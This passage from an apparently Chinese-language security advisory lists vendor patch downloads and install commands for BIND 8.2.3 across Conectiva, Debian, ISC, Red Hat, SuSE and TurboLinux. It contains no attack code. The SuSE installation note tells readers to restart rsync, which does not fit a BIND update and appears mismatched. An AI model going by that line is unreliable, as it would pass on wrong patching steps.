ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-utils-8.2.3-1cl.i386.rpm
Conectiva Linux version 6.0及以上版本的用户可以使用apt进行RPM包的更新:
- 把以下的文本行加入到/etc/apt/sources.list文件中:
rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates
(如果你不是使用6.0版本,用合适的版本号代替上面的6.0)
- 执行: apt-get update
- 更新以后,再执行: apt-get upgrade
Debian
------
Debian已经为此发布了一个安全公告(DSA-026-1)以及相应补丁:
DSA-026-1:New version of BIND 8 released
链接:http://www.debian.org/security/2001/dsa-026
补丁下载:
Source archives:
http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3-0.potato.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3-0.potato.1.dsc
http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3.orig.tar.gz
Intel ia32 architecture:
http://security.debian.org/dists/stable/updates/main/binary-i386/bind-dev_8.2.3-0.potato.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/bind_8.2.3-0.potato.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/dnsutils_8.2.3-0.potato.1_i386.deb
Motorola 680x0 architecture:
http://security.debian.org/dists/stable/updates/main/binary-m68k/bind-dev_8.2.3-0.potato.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/bind_8.2.3-0.potato.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/dnsutils_8.2.3-0.potato.1_m68k.deb
Sun Sparc architecture:
http://security.debian.org/dists/stable/updates/main/binary-sparc/bind-dev_8.2.3-0.potato.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/bind_8.2.3-0.potato.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/dnsutils_8.2.3-0.potato.1_sparc.deb
Alpha architecture:
http://security.debian.org/dists/stable/updates/main/binary-alpha/bind-dev_8.2.3-0.potato.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/bind_8.2.3-0.potato.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/dnsutils_8.2.3-0.potato.1_alpha.deb
PowerPC architecture:
http://security.debian.org/dists/stable/updates/main/binary-powerpc/bind-dev_8.2.3-0.potato.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/bind_8.2.3-0.potato.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/dnsutils_8.2.3-0.potato.1_powerpc.deb
ARM architecture:
http://security.debian.org/dists/stable/updates/main/binary-arm/bind-dev_8.2.3-0.potato.1_arm.deb
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
ISC
---
ISC已经提供了新的BIND 8.2.3下载,您也可以下载BIND 9.0或9.1.
下载地址:
http://www.isc.org/products/BIND/bind8.html
http://www.isc.org/products/BIND/bind9.html
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2001:007-03)以及相应补丁:
RHSA-2001:007-03:Updated bind packages available
链接:https://www.redhat.com/support/errata/RHSA-2001-007.html
补丁下载:
Red Hat Linux 5.2:
SRPMS:
ftp://updates.redhat.com/5.2/SRPMS/bind-8.2.3-0.5.x.src.rpm
alpha:
ftp://updates.redhat.com/5.2/alpha/bind-8.2.3-0.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/bind-devel-8.2.3-0.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/bind-utils-8.2.3-0.5.x.alpha.rpm
i386:
ftp://updates.redhat.com/5.2/i386/bind-8.2.3-0.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/bind-devel-8.2.3-0.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/bind-utils-8.2.3-0.5.x.i386.rpm
sparc:
ftp://updates.redhat.com/5.2/sparc/bind-8.2.3-0.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/bind-devel-8.2.3-0.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/bind-utils-8.2.3-0.5.x.sparc.rpm
Red Hat Linux 6.2:
SRPMS:
ftp://updates.redhat.com/6.2/SRPMS/bind-8.2.3-0.6.x.src.rpm
alpha:
ftp://updates.redhat.com/6.2/alpha/bind-8.2.3-0.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bind-devel-8.2.3-0.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bind-utils-8.2.3-0.6.x.alpha.rpm
i386:
ftp://updates.redhat.com/6.2/i386/bind-8.2.3-0.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bind-devel-8.2.3-0.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bind-utils-8.2.3-0.6.x.i386.rpm
sparc:
ftp://updates.redhat.com/6.2/sparc/bind-8.2.3-0.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bind-devel-8.2.3-0.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bind-utils-8.2.3-0.6.x.sparc.rpm
Red Hat Linux 7.0:
SRPMS:
ftp://updates.redhat.com/7.0/SRPMS/bind-8.2.3-1.src.rpm
alpha:
ftp://updates.redhat.com/7.0/alpha/bind-8.2.3-1.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/bind-devel-8.2.3-1.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/bind-utils-8.2.3-1.alpha.rpm
i386:
ftp://updates.redhat.com/7.0/i386/bind-8.2.3-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/bind-devel-8.2.3-1.i386.rpm
可使用下列命令安装补丁:
rpm -Fvh [文件名]
S.u.S.E.
--------
S.u.S.E.已经为此发布了一个安全公告(SuSE-SA:2001:03)以及相应补丁:
SuSE-SA:2001:03:bind8
补丁下载:
i386 Intel Platform:
SuSE-7.1
ftp://ftp.suse.com/pub/suse/i386/update/7.1/n2/bind8-8.2.3-92.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/bind8-8.2.3-92.src.rpm
SuSE-7.0
ftp://ftp.suse.com/pub/suse/i386/update/7.0/n1/bind8-8.2.3-61.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/bind8-8.2.3-61.src.rpm
SuSE-6.4
ftp://ftp.suse.com/pub/suse/i386/update/6.4/n1/bind8-8.2.3-0.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/bind8-8.2.3-0.src.rpm
SuSE-6.3
ftp://ftp.suse.com/pub/suse/i386/update/6.3/n1/bind8-8.2.3-0.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/bind8-8.2.3-0.src.rpm
SuSE-6.2
ftp://ftp.suse.com/pub/suse/i386/update/6.2/n1/bind8-8.2.3-0.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/6.2/zq1/bind8-8.2.3-0.src.rpm
SuSE-6.1
ftp://ftp.suse.com/pub/suse/i386/update/6.1/n1/bind8-8.2.3-0.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/6.1/zq1/bind8-8.2.3-0.src.rpm
SuSE-6.0
Please use the SuSE-6.1 packages for the SuSE-6.0 distribution on the
i386 Intel Platform.
AXP Alpha Platform:
SuSE-7.0
ftp://ftp.suse.com/pub/suse/axp/update/7.0/n1/bind8-8.2.3-39.alpha.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/bind8-8.2.3-39.src.rpm
SuSE-6.4
ftp://ftp.suse.com/pub/suse/axp/update/6.4/n1/bind8-8.2.3-0.alpha.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/bind8-8.2.3-0.src.rpm
SuSE-6.3
ftp://ftp.suse.com/pub/suse/axp/update/6.3/n1/bind8-8.2.3-0.alpha.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/bind8-8.2.3-0.src.rpm
SuSE-6.1
ftp://ftp.suse.com/pub/suse/axp/update/6.1/n1/bind8-8.2.3-0.alpha.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/axp/update/6.1/zq1/bind8-8.2.3-0.src.rpm
PPC Power PC Platform:
SuSE-7.0
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/n1/bind8-8.2.3-39.ppc.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/bind8-8.2.3-39.src.rpm
SuSE-6.4
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/n1/bind8-8.2.3-0.ppc.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/bind8-8.2.3-0.src.rpm
Sparc Platform:
Due to build bottlenecks, the update package for the sparc platform
(SuSE-7.0 distribution) is delayed.
___________________________________________________________________________=
补丁安装方法:
用“rpm -Fhv file.rpm”命令安装文件,完成后,如果rsync服务是用inetd启动的,向inetd进程发送信号重启之。如果rsync是用“rsync --daemon”命令启动的,则再用此命令重启rsync服务。
TurboLinux
----------
TurboLinux已经为此发布了一个安全公告(TLSA2001004-1)以及相应补丁:
TLSA2001004-1:Bind-8.2.3-2
链接:
补丁下载:
TurboLinux RPM 6.0 bind-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-8.2.3-2.i386.rpm
TurboLinux RPM 6.0 bind-contrib-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-contrib-8.2.3-2.i386.rpm
TurboLinux RPM 6.0 bind-devel-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-devel-8.2.3-2.i386.rpm
TurboLinux RPM 6.0 bind-utils-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-utils-8.2.3-2.i386.rpm
浏览次数:6276
严重程度:0(网友投票)
绿盟科技给您安全的保障